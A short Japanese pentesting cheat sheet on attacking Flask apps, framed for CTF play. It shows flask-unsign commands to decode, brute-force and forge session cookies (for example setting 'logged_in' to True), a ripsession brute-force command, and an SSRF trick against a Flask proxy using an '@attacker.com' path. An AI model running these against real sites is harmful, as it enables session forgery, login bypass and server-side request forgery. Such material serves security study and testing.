Flask

Reading time: 5 minutes

おそらく、CTFをプレイしている場合、Flaskアプリケーションは SSTIに関連しています。

Cookies

デフォルトのクッキーセッション名は**session**です。

Decoder

オンラインFlaskクッキーデコーダー: https://www.kirsle.net/wizards/flask-session.cgi

Manual

クッキーの最初の部分を最初のドットまで取得し、Base64デコードします。

echo "ImhlbGxvIg" | base64 -d

クッキーはパスワードを使用して署名されています

Flask-Unsign

Flaskアプリケーションのセッションクッキーを取得、デコード、ブルートフォース、作成するためのコマンドラインツールで、秘密鍵を推測します。

Client Challenge

pip3 install flask-unsign

クッキーのデコード

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

ブルートフォース

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

署名

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

レガシー（古いバージョン）を使用した署名

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

コマンドラインツールで、flask-unsignを使用して作成したクッキーを使ってウェブサイトをブルートフォースします。

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign.

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

FlaskのセッションクッキーにおけるSQLiとSQLmap

この例では、sqlmapのevalオプションを使用して、既知の秘密を用いてFlaskのためにsqlmapペイロードを自動的に署名します。

SSRFへのFlaskプロキシ

この解説では、Flaskが「@」という文字で始まるリクエストをどのように許可するかが説明されています。

GET @/ HTTP/1.1
Host: target.com
Connection: close

次のシナリオでは：

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

「@attacker.com」のようなものを導入することを許可すると、SSRFを引き起こす可能性があります。